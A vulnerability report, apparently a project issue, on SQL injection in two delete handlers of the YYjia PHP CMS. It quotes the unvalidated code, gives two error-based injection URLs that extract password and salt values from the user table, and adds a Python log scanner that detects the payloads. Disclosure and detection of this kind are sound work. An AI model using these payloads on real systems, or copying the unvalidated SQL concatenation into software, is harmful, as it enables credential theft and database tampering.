YYjia cms front-end filtering is lax, resulting in injection #2
I looked at this file and found that there are still vulnerabilities:
} elseif ($caozuo == "delapp") {
    $uploadid = $_GET['id'];   // taken straight from the query string, never validated
    $lx = $_GET[lx];
    $sql = "delete from user_data where zxid='" . $uploadid . "' and type='2'";
    $_SGLOBAL['db']->query($sql);
    $sql = "select * from " . tname('appinfo') . " where id=$uploadid";   // unquoted in SQL
    $appinfo = $_SGLOBAL['db']->fetch_array($_SGLOBAL['db']->query($sql));
    $logofile = S_ROOT . $appinfo['logo'];
    if ($logofile) {
        unlink($logofile);
    }
    if ($appinfo[type] == 2) {
        $dsql = "select imgurl from androidinfo where appid='" . $uploadid . "'";
    } elseif ($appinfo[type] == 1) {
        $dsql = "select imgurl from appleinfo where appid='" . $uploadid . "'";
    } elseif ($appinfo[type] == 3) {
        $dsql = "select imgurl from wpinfo where appid='" . $uploadid . "'";
    }
    $dquery = $_SGLOBAL['db']->query($dsql);
    $andrvalue = $_SGLOBAL['db']->fetch_array($dquery);
    $filepics = explode("@", $andrvalue[imgurl]);
    foreach ($filepics as $dkey => $dval) {
        $dval = substr($dval, 19);
        $filepic = S_ROOT . $dval;
        if ($filepic) {
            unlink($filepic);
        }
    }
    $sql1 = "delete from appinfo where id=" . $uploadid;   // unquoted again
    $_SGLOBAL['db']->query($sql1);
    if ($lx == "1") {
        $sql2 = "delete from appleinfo where appid=" . $uploadid;
        $_SGLOBAL['db']->query($sql2);
    } elseif ($lx == '2') {
        $sql3 = "delete from androidinfo where appid=" . $uploadid;
        $_SGLOBAL['db']->query($sql3);
    } elseif ($lx == '3') {
        $sql4 = "delete from wpinfo where appid=" . $uploadid;
        $_SGLOBAL['db']->query($sql4);
    }
    showmessage("records deleted successfully", "index.php?ac=user&op=myapps");
}
Almost none of these parameters are filtered.
http://192.168.218.13:805//index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23
Entering the backend:
There is another one:
if ($caozuo) {
    if ($caozuo == "delcom") {
        $commentid = $_GET['commentid'];   // unvalidated, concatenated unquoted into SQL below
        if ($commentid) {
            $sql = "delete from user_data where uid='" . $uid . "' and type='4' and zxid=" . $commentid;
        } else {
            $sql = "delete from user_data where uid='" . $uid . "' and type='4'";
        }
        $aa = $_SGLOBAL['db']->query($sql);
        showmessage("records deleted successfully", $_SERVER['HTTP_REFERER']);
    }

Access:
/index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23
(45app is the demo site of yyjia)
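As an added defender-side example (not part of the original report or of YYjia's code), the following Python scans web-server access logs for requests to the two handlers above whose id parameter is not the plain integer the code expects, and separately flags the updatexml/extractvalue pattern seen in the PoC URLs; the log lines are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two delete handlers quoted above and the GET parameter each one
# concatenates straight into its SQL string.
HANDLER_PARAMS = {"delapp": "id", "delcom": "commentid"}

# Error-based injection functions used in the PoC URLs above.
ERROR_FUNCS = re.compile(r"\b(updatexml|extractvalue)\s*\(", re.IGNORECASE)

# Request target inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def check_request(url):
    """Return (handler, param, reason) for a suspicious request, or None
    when the handler's id parameter is the plain integer the code expects."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if qs.get("ac", [""])[0] != "user":
        return None
    handler = qs.get("caozuo", [""])[0]
    param = HANDLER_PARAMS.get(handler)
    if param is None:
        return None
    for value in qs.get(param, []):  # parse_qs has already percent-decoded
        if re.fullmatch(r"-?\d+", value):
            continue
        if ERROR_FUNCS.search(value):
            return (handler, param, "error-based sqli")
        return (handler, param, "non-integer id")
    return None


def scan_log(lines):
    """Apply check_request to every request line; return all findings."""
    findings = []
    for line in lines:
        m = REQUEST_RE.search(line)
        hit = check_request(m.group(1)) if m else None
        if hit:
            findings.append(hit)
    return findings


# Constructed sample log: one legitimate delete, then the two PoC requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2015:10:00:00 +0800] "GET /index.php?ac=user&caozuo=delapp&id=12&lx=2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2015:10:00:01 +0800] "GET /index.php?ac=user&caozuo=delapp&id=-1%20and%20updatexml(1,concat(0x17,(select%20salt%20from%20`user`+limit+0,1)),0)%23 HTTP/1.1" 200 733',
    '10.0.0.9 - - [01/Jan/2015:10:00:02 +0800] "GET /index.php?ac=user&caozuo=delcom&commentid=-1%20and%20updatexml(1,concat(0x17,(select%20password%20from%20`user`+limit+0,1)),0)%23 HTTP/1.1" 200 733',
]
```

The same integer check, applied server-side (for example intval on id and commentid before they reach the query), is the fix the report is asking for.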
:)
Aren't you going to fix it any more? I still have a few more tips.